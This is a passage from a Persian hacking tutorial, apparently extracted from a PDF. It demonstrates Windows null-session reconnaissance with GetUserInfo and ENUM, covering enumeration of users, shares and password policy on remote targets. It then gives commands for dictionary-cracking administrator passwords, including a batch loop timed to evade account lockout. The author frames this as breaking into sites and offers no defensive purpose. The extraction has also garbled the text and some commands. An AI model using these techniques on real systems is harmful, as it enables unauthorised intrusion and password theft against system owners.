ﺷﻨﺎﺱ ﻪ ﺱﻴ ﺴﺘﻤﯽ ) (SIDه ﺮ ی ﮏ از ﮐ ﺎرﺏﺮان ﺱﻴ ﺴﺘﻢ را ﮐ ﺸﻒ ﮐ ﺮدﻩ و ﺷ ﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﺷﻨﺎﺱﻪ ﻣﺪیﺮ ﺱﻴﺴﺘﻢ ) ( SID=500را ﭘﻴﺪا ﮐﻨﻴﺪ .ﮔﺰیﻨﻪ دیﮕ ﺮی ﮐ ﻪ ﻣ ﻮرد ﺏﺮﺱ ﯽ ﻗ ﺮار ﻣﻴ ﺪهﻢ ﮔﺰیﻨ ﻪ Servicesاﺱ ﺖ ﮐ ﻪ ﺕﻤ ﺎم ﺱ ﺮویﺲ هﺎی ﻓﻌﺎل ﺏﻌﻼوﻩ ﻧﺴﺨﻪ ﻧﺮم اﻓﺰار را ﺏﻪ ﻣﺎ ﻣﯽ ﮔﻮیﺪ .ﮔﺰیﻨﻪ ﺏﻌﺪی ﮔﺰیﻨﻪ Sessionsاﺱﺖ ﮐﻪ ﮐﺎر ایﻦ ﮔﺰیﻨﻪ ایﻦ اﺱﺖ ﮐﻪ ﺏﻪ ﻣ ﺎ ﻟﻴ ﺴﺘﯽ از اﺱ ﺎﻣﯽ NetBIOSﺱﺎیﺮ ﺱﻴﺴﺘﻢ هﺎیﯽ ﻣﻮﺟﻮد را ﮐﻪ ﺏﻪ ﺱﻴﺴﺘﻢ ﻣﻘﺼﺪ ﻣﺘﺼﻞ اﺱﺖ ﺏﻪ ﻣﺎ ﻣﻴﺪه ﺪ .ﮔﺰیﻨ ﻪ ﺏﻌ ﺪی Registryاﺱ ﺖ ﮐ ﻪ ی ﮏ ﭘ ﺮس ﺟ ﻮ درﺏ ﺎرﻩ ایﻦ ﮐﻪ اﺟﺎزﻩ دﺱﺖ رﺱﯽ از راﻩ دور ﺏﻪ Registryرا ﻣﻴﺪهﺪ یﺎ ﻧﻪ و یﮑﺴﺮی ﺧﻮرد ریﺰ دیﮕﻪ.ﺧﻮب ﮔﺰیﻨﻪ هﺎی ﻣﻬﻢ ایﻦ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺕﺠﺮﺏﻪ ای ﮐﻪ دارم ﺏﻪ ﺷﻤﺎهﺎ ﮔﻔﺘﻢ ﺏﻘﻴﻪ اش ﺏﺎ ﺧﻮدﺕﺎن راﺱﺘﯽ ﺡﺘﻤﺎ ایﻦ ﺕﺤﺖ ﺧﻂ ﻓﺮﻣﺎن اﺟﺮا ﮐﻨﻴﺪ و یﮏ زرﻩ ای ﺏﺎ ﺁن ﺏ ﺎزی ﮐﻨﻴ ﺪ ﺏﺒﻴﻨﻴ ﺪ ﺏ ﺪرد ﺕ ﺎن ﻣ ﯽ ﺧ ﻮرد ی ﺎ ﻧﻪ!! اﺏﺰار : joeware اﺏﺰار دیﮕﺮی ﮐﻪ ﺏﺮای ویﻨﺪوز ﻣﻴﺘﻮان ﻣﻌﺮﻓﯽ ﮐﺮد ﺏﻪ ﻣﺠﻤﻮﻋﻪ اﺏﺰار joewareﮐﻪ ﺕﻮﺱﻂ ﺁﻗﺎی Joe Richardsﺕﻮﺱﻌﻪ یﺎﻓﺘﻪ اﺷﺎرﻩ ﮐﺮد .ﮐﻪ ﻣ ﻦ یﮑﯽ از ایﻦ اﺏﺰار هﺎ را زیﺎد اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﻢ ﺏﻪ ﻧﺎم Get User Infoاﻟﺒﺘﻪ ایﻦ ﻣﺠﻤﻮﻋ ﻪ ،اﺏﺰاره ﺎی ﺏﻴ ﺸﺘﺮی ه ﻢ دارد ﮐ ﻪ ﺧ ﻮب اﺱ ﺖ وﻟ ﯽ ای ﻦ یﮑﯽ را دوﺱﺖ دارم ﭼﻮن ﮐﺎر راﻩ ﻣﯽ اﻧﺪازد ﺏﺮای ﻣﻦ ،ﮐﻪ ﺏﻪ ﺷﻤﺎ هﺎ هﻢ ﻣﻴﮕﻮیﻢ ﮐﻪ ﺷﺎیﺪ ﺏﻪ درد ﺷﻤﺎهﺎ هﻢ ﺏﺨﻮرد. ای ﻦ اﺏ ﺰار ﺧﺮوﺟ ﯽ ﺡﺎﺻ ﻞ از اﺟ ﺮای ﺁن ﺏ ﺴﻴﺎر ﺷ ﺒﻴﻪ ﻓﺮﻣ ﺎن Net userﺧ ﻮد ویﻨ ﺪوز ﮐ ﻪ اﮔ ﺮ دوام ﺁوردم ﺏ ﺮای ﺷ ﻤﺎهﺎ ای ﻦ ﻓﺮﻣﺎﻧﻬ ﺎی netرا ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ،وﻟﯽ یﮏ ﺱﺮی ﺕﻔﺎوﺕﻬﺎی اﺱﺎﺱﯽ دارد ﮐﻪ ایﻦ اﺏﺰار را ،از ﺏﻘﻴﻪ ﻣﺘﻤﺎیﺰ ﻣﻴﮑﻨﺪ .ﺏﺒﻴﻨﻴﻢ ﮐﻪ ﺏﻌﺪ از اﺟﺮای ایﻦ ﻧﺮم اﻓﺰار ﺏﺎ ﻧﺎم ﮐ ﺎرﺏﺮ Administratorﭼﻪ ﺟﻮاﺏﯽ ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ. C: \> getuserinfo.exe administrator )Getuserlnfo V02.05.O0cpp Joe Richards (
[email protected] January 2002 User information for [Local]\administrator User Name Administrator Full Name Description Built-in account for administrating the Computer/domain Users Comment User Type Admin Enhanced Authority Account Type Global
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢١
Workstations Home Directory L User Profile Logon Script Flags NO_PWD_EXPIRE Account Expires Never Password age in days 249 Password last set 7/6/2001 3:22 PM Bad PWD count 0 )Num logons (this machine 2432 Last logon 3/12/2002 8:24 PM Logon hours All Global group memberships *None Local group memberships *Administrators Completed .
ﺕﻔﺎوﺕﻬﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ را ﺏﺎ Net userرا ﺏﺎ ﺧﻂ زرد ﻧﺸﺎن دادﻩ ام .اﻃﻼﻋ ﺎت ﺏ ﺎ ﻗﻴﻤﺘ ﯽ در ﺏ ﺎرﻩ ﮐﻠﻤ ﻪ ﻋﺒ ﻮر ﺏﺪﺱ ﺖ ﺁوردﻩ اﺱ ﺖ ﮐ ﻪ در ﻓﻴﻠ ﺪ ه ﺎی Password age in daysو Bad PWD countو ) Num logons (this machineﻧﻤﺎیﺶ ﻣﻴﺪهﺪ ﮐﻪ ﮐﺎر ﻣ ﺎ را ﺏ ﺮای ﺕﺠﺰی ﻪ و ﺕﺤﻠﻴ ﻞ و... راﺡﺖ ﻣﻴﮑﻨﺪ .ﻓﻴﻠﺪ Bad PWD countرا ﻣﻴﺘﻮان ﮔﻔﺖ ﮐﻪ ﻧﺸﺎﻧﻪ ای از ﺕﻼش ﺏﺮای دﺱ ﺘﻴﺎﺏﯽ ﺏ ﻪ ﮐﻠﻤ ﻪ ﻋﺒ ﻮر ﻓ ﺮض ﮐ ﺮد و ﻣﻘ ﺪار ای ﻦ ﻣﻮﻋ ﺪ ﻗﻔ ﻞ ﺷﺪن ﺡﺴﺎب را ﺏﻮاﺱﻄﻪ اﺱﺮار در ﺏﮑﺎرﮔﻴﺮی ﮐﻠﻤﺎت اﺷ ﺘﺒﺎﻩ را ﻧ ﺸﺎن ﻣﻴﺪه ﺪ .ﻓﻴﻠ ﺪ Password age in daysزﻣ ﺎن ﺕﻐﻴﻴ ﺮ ﻧﮑ ﺮدن ﭘ ﺴﻮرد را ﺏ ﺮ ﺡﺴﺐ روز ﻧﺸﺎن ﻣﻴﺪهﺪ .ﻓﻴﻠﺪ Num logonsﺕﻌﺪاد دﻓﻌﺎت وارد ﺷﺪن ﺏﻪ ﻣﺎﺷﻴﻦ ﺕﻮﺱﻂ ایﻦ ﺡﺴﺎب را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ.ﺏﺮای دیﺪن ﻧﺎم ﺕﻤﺎم ﮐﺎرﺏﺮان ﺏ ﺎ ایﻦ ﻧﺮم اﻓﺰار از دﺱﺘﻮر زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ : C:\>Getuserinfo.exe \. اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﮐﻪ ﻣﺜﻼ ﺟﻮاب ﻣﻴﮕﻴﺮیﻢ: C:\>Getuserinfo.exe \. )Getuserlnfo V02.05.O0cpp Joe Richards (
[email protected] January 2002
]User Accounts For [Local -----------------------------------------------------------------------------------------------------------------Administrator Orc Skycladgirl Test ____Vmware_user ﺧﻮب ایﻦ را ذﮐﺮ ﮐﻨﻢ ﮐﻪ ایﻦ اﺏﺰار هﻢ Localاﺱﺖ هﻢ Remoteﺏﻪ ایﻦ ﺻﻮرت ﮐﻪ: C:\> Getuserlnfo.exe \\ x.x.x.x\. C:\> Getuserlnfo.exe domain \\x.x.x.x\. ﺧﻮب ایﻦ دوﺕﺎ ﻟﻴﺴﺖ ﮐﺎرﺏﺮ هﺎی IPﻣﻮرد ﻧﻈﺮ ﻣﺎ را ﻧﺸﺎن ﻣﻴﺪهﺪ ) ﺏﻪ ﺟﺎی x.x.x.xﺷﻤﺎرﻩ IPهﺪف ﻣﻮرد ﻧﻈﺮ ﺧﻮد را ﺏﻨﻮیﺴﻴﺪ( . اﻟﺒﺘﻪ ﺏﻌﺪ از ﺏﺪﺱﺖ ﺁوردن ﻟﻴﺴﺖ ﮐﺎرﺏﺮان ﻣﻴﺘﻮاﻧﻴﺪ اﺱﻢ ﺁن ﮐﺎرﺏﺮ را ﺏﻪ ﺟﺎی ) ( .ﺏﻨﻮیﺴﻴﺪ و اﻃﻼﻋﺎت ﺕﮑﻤﻴﻠﯽ را ﺏﮕﻴﺮیﺪ. اﺏﺰار : ENUM اﺏﺰار دیﮕﺮی ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﮐﻪ اﻟﺒﺘﻪ دارای ﻗﺎﺏﻠﻴﺘﻬﺎی ﺧﻮﺏﯽ ﻧﻴﺰ هﻢ هﺴﺖ ENUMاﺱﺖ . ایﻦ اﺏﺰار از ﻧﻮع ﮐﺪ ﺏﺎز ﺏﻮدﻩ و ﮐﺪ هﺎی ﺁن در دﺱﺘﺮس هﻤﮕﺎن اﺱﺖ ﭘﺲ اﮔﺮ ﻧﻴﺎزی ﺏﻪ ﺕﻐﻴﺮات داﺷﺘﻴﺪ دﺱﺖ ﺷﻤﺎ ﺏﺎز اﺱﺖ .ﻣﺜ ﻞ ﺏﻴ ﺸﺘﺮ ﻧ ﺮم اﻓ ﺰار هﺎی ﺧﻔﻦ ﮐﺪ هﺎی ﺁن ﺏﺮ ﭘﺎیﻪ C++اﺱﺖ .اﻟﺒﺘﻪ ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ ﺏﺮای ﻧﻔﻮذ ﺏﺎ ایﻦ اﺏﺰار ﺏﺎی ﺪ ﭘ ﻮرت ١٣٩ﺏ ﺎز ﺏﺎﺷ ﺪ اﻟﺒﺘ ﻪ ﻓﻘ ﻂ ﺏ ﺮای ﻧﻔ ﻮذ ﺏﺎی ﺪ ای ﻦ ﭘﻮرت ﺏﺎز ﺏﺎﺷﺪ.ﮔﺰیﻨﻪ هﺎی ایﻦ ﻧﺮم اﻓﺰار ﺏﺴﻴﺎر اﺱﺖ ﮐﻪ اﻟﺒﺘﻪ ﻣﻦ ﻣﺜﻞ روال ﻣﻘﺎﻟﻪ هﻤﻪ ﺁﻧﻬﺎ را ﺕﻮﺽﻴﺢ ﻧﻤﯽ دهﻢ !! ﻗﺎﺏﻠﻴﺘﻬﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺴﻴﺎر زیﺎد اﺱﺖ ﻣﺜﻼ وﻗﺘﯽ از ﺷﻤﺎ ﺱﻴﺴﺘﻤﯽ ﮐﻠﻤﻪ ﻋﺒﻮر و ﻧﺎم ﮐﺎرﺏﺮ ﻣﻴﺨﻮاهﺪ و ﮐﺎر دیﮕﻪ ان ﺟﻤﻊ ﺁوری اﻃﻼﻋ ﺎت از ﺱﻴ ﺴﺘﻢ هﺪف اﺱﺖ ﮐﻪ ﻣﻦ ﻓﻌﻼ دﻧﺒﺎل ایﻦ هﺴﺘﻢ ﻧﻪ ﭼﻴﺰ دیﮕﻪ ایﯽ اﻟﺒﺘﻪ اوﻟﯽ را هﻢ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ .وﻗﺘ ﯽ در ﺧ ﻂ ﻓﺮﻣ ﺎن اﺟ ﺮا ﻣﻴﮑﻨﻴ ﺪ ﺏﺮﻧﺎﻣ ﻪ را ای ﻦ ه ﺎ را ﻣﯽ ﺏﻴﻨﻴﺪ: C :\> enum.exc Usage: enum.exe ][switches ][hostname │ip -U: get user list -M: get machine list )-N: get name list dump (different from -U │-M -S: get share list -P: get password policy information -G: get group and member list -L: get LSA policy information -D: dictionary crack, needs -u and -f -d: he detailed, applies to -U and -s
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢٢
-c: don’t cancel sessions ) "" -U: specify username to use (default ) "" -p: specify password to use (default )-f: specify dictfile to use (wants D
ﮐﻪ ایﻦ دﻓﻌﻪ ﺱﻌﯽ ﻣﯽ ﮐﻨﻢ ﺏﺮ ﺧﻼف روال ﻣﻘﺎﻟﻪ یﮏ ﮐﻤﯽ ﺏﻴﺸﺘﺮ ﺕﻮﺽﻴﺢ ﺏﺪهﻢ .هﻮرا !!!! هﻔ ﺖ ) ( ٧ﮔﺰیﻨ ﻪ اول " ﺕﻮﺟ ﻪ ﮐﻨﻴ ﺪ " ﺏ ﺎ ﻓ ﺮض ای ﻦ ﮐ ﻪ ﻣﻨﺒ ﻊ ﻣ ﺸﺘﺮک IPC$از ﻃﺮی ﻖ ﭘ ﻮرت ١٣٩و ی ﺎ ۴۴۵ﻗﺎﺏ ﻞ دﺱ ﺖ ی ﺎﺏﯽ اﺱ ﺖ اﻧﺒ ﻮهﯽ اﻃﻼﻋﺎت را درﺏﺎرﻩ ﺱﻴﺴﺘﻢ هﺪف ﺏﺮای ﻣﺎ ﺟﻤﻊ ﺁوری ﻣﯽ ﮐﻨﺪ ).اﻟﺒﺘﻪ اﺕﺼﺎل ﻣﺎ ﺏﺎ ﻗﺮﺏﺎﻧﯽ هﻢ در ایﻦ ﺏﺮﻧﺎﻣﻪ و ﺏﺮﻧﺎﻣﻪ ﻗﺒﻠﯽ از ﻧ ﻮع NULLیﻌﻨ ﯽ ﻧﺎﺷﻨﺎس اﺱﺖ (.اﺟﺮای ایﻦ ٧ﮔﺰیﻨﻪ ﺏﺎ هﻢ اﻣﮑﺎن ﭘﺬیﺮ اﺱﺖ وﻟﯽ ﺁﻧﻘﺪر ﺏﻪ ﻣﺎ ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ ﮔﻴﺞ ﻣﻴﺸﻮیﻢ . C:\ enum.exe UMNSPGLD 192.168.0.3 هﻤﺎﻧﻄﻮر ﮐﻪ ﮔﻔﺘﻢ ایﻦ دﺱﺘﻮر درﺱﺖ اﺱﺖ وﻟﯽ ﺟﻮاﺏﻬﺎ زیﺎد و ﺕﺠﺰیﻪ ﺕﺤﻠﻴﻞ ﺁن ﻣ ﺸﮑﻞ اﺱ ﺖ ﻣ ﻦ ﻋﻤ ﻼ از ای ﻦ ﺕﺮﮐﻴﺒ ﺎت ﮐ ﻪ ﻣﻴﮕ ﻮیﻢ اﺱ ﺘﻔﺎدﻩ ﻣﻴﮑ ﻨﻢ .ﻣﺜﻼ ﻣﻦ ﺕﺮﮐﻴﺒﯽ از ﺱﻮیﭻ هﺎی UPGرا اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻢ ﻣﺜﻞ: C :\> enum UPG xxx.xxx.xxx.xxx Server: xxx.xxx.xxx.xxx Password policy: min length: none min age: none max age: 42 days lockout threshold: none lockout duration: 30 mins lockout reset: 30 mins getting user list (pass 1, index 0) . . . success, got 5. Administrator Guest IUSR_ALPHA IWAN ALPHA Tslternet User Group: Administrators ALPHA \ Administrator Group: Guests ALPHA \ Guest ALPHA \ Ts Internet User ALPHA \ IUSR_ALPHA ALPHA \ IWAM_ ALPHA Group: Power Users
هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﯽ ﺏﻴﻨﻴﺪ ﺏﻪ واﺱﻄﻪ وﺟﺪ ﺧﻄﻮط زرد ﭘﯽ ﺏﻪ ایﻦ ﻣﻮﺽﻮع ﻣﯽ ﺏﺮیﻢ ﮐﻪ ایﻦ ﻣﺎﺷﻴﻦ هﻠﻮ اﺱﺖ .واﺽﺢ اﺱﺖ ﮐﻪ هﻴﭻ ﻣﺤﺪودیﺘﯽ در ﺏﺮاﺏ ﺮ ﺡﺪس زدن ﻧﺎدرﺱﺖ ﮐﻠﻤ ﻪ ﺕﻮﺱ ﻂ ﻣﻬ ﺎﺟﻢ وﺟ ﺪ ﻧ ﺪارد و ﺏ ﺎ وﺟ ﺪ ﻧ ﺸﺎﻧﻪ ه ﺎی ) IUSR_ALPHAو ( IWAN ALPHAﻣ ﺎ ﭘ ﯽ ﻣﻴﺒ ﺮیﻢ ﮐ ﻪ ﻧ ﺮم اﻓ ﺰار ﺱﺮویﺲ دهﻨﺪﻩ وب ) (WEBاﺡﺘﻤﺎل ﻗﺮیﺐ ﺏﻪ یﻘﻴﻦ IISدر ﭘﻴﺖ ﻣﺎیﮑﺮوﺱﺎﻓﺖ اﺱﺖ )هﻮرا ﺱﺎیﺖ هﮏ ﺷﺪ دیﮕﻪ (!!!! و ﻧﺸﺎﻧﻪ Tslternet Userﺧﺒﺮ از ﻓﻌﺎﻟﻴﺖ ﺱﺮویﺲ Terminal Servicesرا ﺏﻪ ﻣﺎ ﻣﯽ دهﺪ. اﺟﺎزﻩ دهﻴﺪ یﮏ ﺕﺮﮐﻴﺐ هﺎی ﺱﻮیﭻ دیﮕﺮی را هﻢ ﺏﮕﻮیﻢ .ﻣﯽ ﻧﻮیﺴﻴﻢ : C :\> enum.exe MNS xxx.xxx.xxx.xxx Server: xxx.xxx.xxx.xxx Setting up session … success. Getting namelist (pass 1) … got 5, 0 left: Administrator Guest IUSR_ALPHA IWAM_ALPHA TsInternetUser Enumerating shares (pass 1) … got 3 shares , 0 left: IPC$ ADMIN$ C$ GETTING MACHINE LIST (PASS 1 , INDEX 0) … SUCCESS , GOT 0. CLEANING UP … SUCCESS. هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﯽ ﺏﻴﻨﻴﺪ ﻋﻼوﻩ ﺏﺮ ﻧﻤﺎیﺶ ﻟﻴﺴﺖ ﮐﺎرﺏﺮان ﻣﻮﺟﻮد ﻣﻨﺎﺏﻊ ﻣﺸﺘﺮک ﻣﻮرد اﺱ ﺘﻔﺎدﻩ را ﻧﻴ ﺰ ﺁﺷ ﮑﺎر ﺷ ﺪﻩ اﺱ ﺖ .اﻟﺒﺘ ﻪ ﺏ ﺎ ﺕﻮﺟ ﻪ ﺏ ﻪ اﻃﻼﻋ ﺎت ﺏﺎﻻ ﻣﻴﺘﻮان ﺡﺪس ﻗﺮیﺐ ﺏﻪ یﻘﻴﻦ زد ﮐﻪ ﺱﻴﺴﺘﻢ ﻣﻮرد ﻧﻈﺮ ﻓﻘﻂ دارای یﮏ درایﻮ هﺎرد اﺱﺖ ﮐﻪ در ﺧﺮوﺟﯽ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺻﻮرت C$ﻧﻤﺎیﺶ دادﻩ ﺷﺪﻩ اﺱ ﺖ .ﺏ ﺎ ﺕﻮﺟ ﻪ ﺏ ﻪ ای ﻦ اﻃﻼﻋ ﺎت ) ﻣ ﯽ داﻧ ﻴﻢ IISه ﻢ دارد ( ﻣ ﯽ ﺕ ﻮان ای ﻦ ﺟ ﻮری ﻧﺘﻴﺠ ﻪ ﮔﺮﻓ ﺖ ﮐ ﻪ " ری ﺸﻪ ﺱ ﻨﺪ وب " ی ﺎ اﺻ ﻄﻼﺡﺎ Web document rootﻧﻴﺰ ﺏﺮ روی هﻤﻴﻦ درایﻮ و در ﻣﻮﻗﻌﻴﺖ C:\Winnt\temSys32ﻗﺮار دارد .ایﻦ ﺕﺮﮐﻴﺒﯽ ﮐﻪ ﺏﻪ ﺷ ﻤﺎ ی ﺎد دادم ﺕﺮﮐﻴ ﺐ اﺱﺎﺱ ﯽ ﻋﻠﻴﻪ ﺱﺮویﺲ دهﻨﺪﻩ وب ﻣﺨﺼﻮﺻﺎ IISدر ﭘﻴﺖ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ داﺷﺘﻦ ﺏ ﯽ ﻧﻬﺎی ﺖ ﺏ ﺎگ و اﮐ ﺴﭙﻠﻮیﺖ اﺱ ﺖ .ﮔﺰیﻨ ﻪ –Lدر ای ﻦ ﺏﺮﻧﺎﻣ ﻪ اﻃﻼﻋ ﺎﺕﯽ در ﻣﻮرد ﺧﻂ ﻣﺸﯽ اﺡﺮاز هﻮیﺖ در ﺱﻴﺴﺘﻢ ﻣﺤﻠﯽ ) Local Security Authorityو یﺎ ( LSAدر اﺧﺘﻴﺎر ﻣﺎ ﻗﺮار ﻣﻴﺪهﺪ . ﺧﻮب ﻣﻤﮑﻦ اﺱﺖ اﻏﻠﺐ ﺏﺎ ﻣﻮارد ﺧﺎﺻﯽ روﺏﻪ رو ﺷﻮیﺪ ﮐﻪ ﺡﺴﺎب ﻣﺪیﺮ ) ( SID=500ﻓﺎﻗﺪ رﻣﺰ ﻋﺒﻮر ﺏﺎﺷﺪ !!!
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢٣
ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از دو ﮔﺰیﻨﻪ –uو –pﻣﯽ ﺕﻮان اﻃﻼﻋﺎت ﻣﺮﺏﻮط ﺏﻪ ﺷﻨﺎﺱﺎیﯽ یﮏ ﮐﺎرﺏﺮ ﺏﻪ ﺧﺼﻮص را ﻣﻮرد ﺏﺮﺱﯽ ﻗﺮار داد. C:\>enum.exe –UMNSPGL –u administrator –p " " xxx.xxx.xxx.xxx زﻧﮓ ﺕﻔﺮﻳﺢ !!! ایﻦ ﺏﺮای ﭘﻮﻟﺪار هﺎ ﻣﻴﮕﻮیﻢ ﮐﻪ رﻓﺘﻦ ISPزدن و ١٠ﺕﺎ ﺡﺴﺎب ﻣﺪیﺮ روی ﺱﺮور ﺏﺮای ﺕﻤ ﺎم ﺧﺎﻧ ﺪان ﺧ ﻮد ﺏ ﺎز ﮐ ﺮدن .ﺡﺘﻤ ﺎ ﺕ ﺎ ﺏ ﻪ ﺡ ﺎل ای ﻦ ﻣ ﯽ داﻧﺴﺘﻴﺪ ﮐﻪ ﺡﺴﺎب ﻣﺪیﺮ ) ( administratorهﺮﮔ ﺰ ﺏ ﻪ واﺱ ﻄﻪ ﺕ ﻼش ﻧ ﺎﻣﻮﻓﻖ ) وارد ﮐ ﺮدن ه ﺰاران ﺏ ﺎر ﮐﻠﻤ ﻪ ﻋﺒ ﻮر ﻧﺎدرﺱ ﺖ( ﻗﻔ ﻞ ﻧﻤ ﯽ ﺷ ﻮد و هﻤﻴﻦ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﻧﻔﻮذ ﮔﺮهﺎ وﺱﻮﺱﻪ ﺏﺸﻮﻧﺪ ﺕﺎ ﺷﺎﻧﺲ ﺧﻮد را اﻣﺘﺤﺎن ﮐﻨﻨﺪ ﺏﺮای ﮐﺸﻒ ﮐﻠﻤﻪ ﻋﺒﻮر ﻣﺪیﺮ .ﺏ ﺮای رﻓ ﻊ ای ﻦ ﻋﻴ ﺐ ی ﮏ ﻧ ﺮم اﻓ ﺰاری هﺴﺖ در ﺏﺴﺘﻪ ﻧﺮم اﻓﺰاری Windows Resource Kitﺏ ﻪ ﻧ ﺎم Passport/administratorﮐ ﻪ ﺕ ﺎ ﺡ ﺪودی ای ﻦ ﻋﻴ ﺐ را ﺏﺮﻃ ﺮف ﮐ ﺮدﻩ دیﮕ ﻪ ﺏﻘﻴﻪ ﮐﺎر ﺏﺎ ﺧﻮدﺕﺎن . ﺏﺮای ﮐﺸﻒ ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﺎ ایﻦ ﻧﺮم اﻓﺰار ﮐﻪ اﻟﺒﺘﻪ ﮐﻨﺪ ) ﺱﺮﻋﺖ ﮐﻢ !!( هﻢ هﺴﺖ در ایﻦ ﻣﻮرد از ﻓﺮﻣﺎن زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﺏﻪ ایﻦ ﺻﻮرت : C:\>enum.exe –D –u Administrator –f dict.txt ﮐﻪ ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ ﺏ ﻪ ﺟ ﺎی ﻧ ﺎم ﮐ ﺎرﺏﺮ administratorه ﺮ ﻧ ﺎم ﮐ ﺎرﺏﺮ دیﮕ ﺮی را ﻣ ﻮرد اﺱ ﺘﻔﺎدﻩ ﻗ ﺮار دهﻴ ﺪ و ﺏ ﻪ ﺟ ﺎی dict.docه ﻢ ﺁدرس ) در ﺻﻮرت ایﻨﮑﻪ ایﻦ ﻓﺎیﻞ در هﻤﺎن ﭘﻮﺷﻪ ﻧﺒﺎﺷﺪ ( و ﻧﺎم ﻓﺮهﻨﮓ ﻟﻐﺖ ) دیﮑﺸﻨﺮی ( ﺡﻤﻠﻪ ﺧﻮد را وارد ﮐﻨﻴﺪ . ﺧﻮب ایﻦ ﺏﺮای ﺡﺴﺎب هﺎی ﻣﺪیﺮ اﺱﺖ ﮐﻪ هﻴﭻ ﻣﺤﺪودیﺖ زﻣﺎﻧﯽ و ﻃﻮل ﮐﻠﻤﻪ ﻧﺪارد اﺱﺖ .اﻣﺎ اﮔﺮ ﺱﻴﺎﺱﺖ هﺎی اﻣﻨﻴﺘﯽ ﺏﻪ ﮔﻮﻧﻪ ای ﺏﻮد ﮐﻪ ﻣﺜﻼ ﺏﺎ ﺕﻌﺪاد ﭼﻨﺪ ﺏﺎر وارد ﮐﺮدن اﺷﺘﺒﺎﻩ ﮐﻠﻤﻪ ﻋﺒﻮر ﺡﺴﺎب ﻗﻔﻞ ﻣﯽ ﺷﻮد ﺏﻪ ﻣﺪت زﻣﺎن ﻣﺸﺨﺼﯽ ﻣ ﺎ ﺏﺎی ﺪ ﭼ ﻪ ﮐﻨ ﻴﻢ ؟ ﺧ ﻮب ﺏﻌ ﻀﯽ ه ﺎ ﻓﮑ ﺮ ﻣ ﯽ ﮐﻨﻨ ﺪ ﮐ ﺎر دیﮕﺮ ﻣﺤﺎل اﺱﺖ اﻣﺎ ﻣﻦ ﺏﺎ روﺷﯽ ﮐﻪ یﺎدﺕﺎن ﻣﯽ دهﻢ ﻣﺪت ایﻦ ﮐﺎر ﺧﻴﻠﯽ زیﺎد ﻣﻴﺸﻮد وﻟﯽ %١٠٠اﻣﮑﺎن ﭘﺬیﺮ اﺱﺖ . ﺧﻮب ﺏﺎ یﮏ ﻣﺜﺎل ﺁﻣﻮزش ﻣﻴﺪهﻢ .اول ﺱﻴﺎﺱﺘﻬﺎی ﮐﻠﻤﻪ ﻋﺒﻮر را ﺏﺎ ﺱ ﻮیﭻ –pﺏﺪﺱ ﺖ ﻣ ﯽ ﺁوری ﺪ ﮐ ﻪ ﺏ ﺎ اﻃﻼﻋ ﺎﺕﯽ ﮐ ﻪ داری ﺪ ﻣ ﯽ ﻓﻬﻤﻴ ﺪ ﮐ ﻪ ﻣ ﺜﻼ ﺏﻮاﺱﻄﻪ وارد ﮐﺮدن ۵ﺏﺎر ﮐﻠﻤﻪ ﻋﺒﻮر اﺷﺘﺒﺎﻩ ﺡﺴﺎب ﺏ ﺮای ٣٠دﻗﻴﻘ ﻪ ﻗﻔ ﻞ ﻣ ﯽ ﺷ ﻮد ) در ای ﻦ ﻣ ﺪت ﺡﺘ ﯽ ﺏ ﺎ وارد ﮐ ﺮدن ﮐﻠﻤ ﻪ درﺱ ﺖ ه ﻢ ﺏ ﻪ ﺷ ﻤﺎ اﻣﮑﺎن ورود ﺏﻪ ﺡﺴﺎب هﻢ دادﻩ ﻧﻤﯽ ﺷﻮد و یﺎ ﺡﺘﯽ در ایﻦ ﻣﺪت اﺻﻼ ﻧﻤﯽ ﺷﻮد ﺏﻪ ﺁن ﮐﻠﻤﻪ ﻋﺒﻮر داد ( ﺏﺮای ایﻦ ﮐﺎر از دﺱﺘﻮر زی ﺮ اﺱ ﺘﻔﺎدﻩ ﻣ ﯽ ﮐﻨﻴﻢ ) ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺕﺎﺏﻊ ﺕﺎﺧﻴﺮ : ( Sleep C :\>For /F %%p in (dict.exe) do enum.exe u Istari p %% p M xxx.xxx.xxx.xxx >> output.txt && sleep 180s ﺧﻮب یﮏ ﺱﻮیﭻ –Gاﺱﺖ ﮐﻪ ﺏﻪ راﺡﺘﯽ ﻣﯽ ﺕﻮاﻧﻴﺪ ﺡﺴﺎب هﺎی هﻢ ﮔﺮوﻩ را ﮐﺸﻒ ﮐﻨﻴﺪ ﻣﺜﻼ 